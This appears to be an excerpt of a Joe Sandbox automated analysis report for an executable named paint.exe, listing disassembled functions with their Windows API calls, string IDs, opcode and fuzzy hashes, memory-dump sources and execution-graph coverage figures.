                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D51A432B1A642AADB158B15D444638B7A2EB45B98F904134DAAF877C4FF3EE841C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                • Instruction ID: f59d71ac9fe0191e497b64ae552422e79337b99eb5124e347d249ac0d90cd728
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351E532A0D38396EB708F219044369B7A2FB56B9AF944135DA6E877C5EF3DE450CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                • Instruction ID: 9394beb1f63151598161e6eac3594eec2bd9f431080c80af28607362a8daae02
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9261B232A0DBC1D1DB609B15E4403AAB7A1FB86784F444235EBAD57B95EF7DD180CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF6F0BD352C,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD7F22
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                                • Instruction ID: 1adcb07dcad7d3e3814122e2ec0d445c8667ee6a73cf12a533492772514a52df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3631C92161AAC265EB318710A4507EAA355EF85BE4F840231EA7E877C9FE3DD5018700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                • Instruction ID: c399f70295f292b7a3f56ff47f6c04ec31914b0aee136e82ca984e476719bc4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921E272B09B81A2E7109B54F4447EA73A5FB89784F800132EE8E93796EF3DD245C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                • Instruction ID: 0cbb36abafdf50650cd2a646155c75b64e2594921c9e3c62a75212670793cb35
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D13172B18A859AE710CF64D4442AC37B1FB46798B809276DE6ED7BC9EE39D407C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                • Instruction ID: 4f3525148bb14eb7aed24629eabfcecfb341625919f94f8df42d5689f98b04ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4512672F08116AAEB14CF74D9516BC27A6AB0135AF914175DE2FD2BE5EF39E401C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                                • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                                • Instruction ID: 7af00b50604d72ab9806f2ae3be5013dec9a51a9a07b75e2a7c470dc233a74e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951AC26E086419AFB10DFB1D4603BD23A1AB4AB98F948535DE2E977C9EF39D4418700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                • Instruction ID: fec8874e5c695777c2cc03d451db32959966f9dd72c11fc4c890c18a75053bb9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B611E921A1D582A2F75487A9E6446799253EF96780FC88030DB6B47BCAED3ED4958200
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                                • Instruction ID: 50afb2f535af5cd588d30a6cce8bf657457c97fc794cc3acbba9ef9be5b012a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92412726A0C38262FF209B6594013795698EB82BA5F904235EF7F87BD5FF3ED4418700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE90B6
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6F0BDCC15), ref: 00007FF6F0BE90D4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                                • API String ID: 3580290477-805208900
                                                                                                                                                                                                                                                                • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                                • Instruction ID: 5fa3d13b04e764bf0fb41abbcfc1196389664612a6ee61fba1c50a048ba0f767
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F417F36A08B53A6EB14DF25D4400BD63A4EF467D0B954075ED6F83BC6EE3EE4958340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                • Instruction ID: 1248eb2e0edb7a13df03bfeee9d771d34271181080581012650bfa16a04786cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6141B472B18A4595DB208F25E8443A96765FB99794FC08031EE5EC77D8EF3ED401C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                                                                • Instruction ID: 1649b0adae0421e439bd1163fabc03e1f2b7601d75be50cd600468e237bf34c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58210463B0828296FB209B11D04426D73B2FB85B44FD58035DAAE837D4EF7EE945CB40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                • Instruction ID: de9154bc5d2f83437673e0bf81cc70f8c64743efad34a3845752fa93014ab389
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB116D32609B8192EB208F15F400269B7E5FB89B85F984230DF9E477A9EF3DC551CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                • Instruction ID: 66c3e0b18368ed52c6b718f302a14bb7ebdb5486661301eb11f00261e34a9cc3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1501846692C20395F720AFA0986627E63A4EF56749FC00035D56EC37D1FF3DE9048B15

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.9%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0.8%
                                                                                                                                                                                                                                                                Total number of Nodes:1202
                                                                                                                                                                                                                                                                Total number of Limit Nodes:98
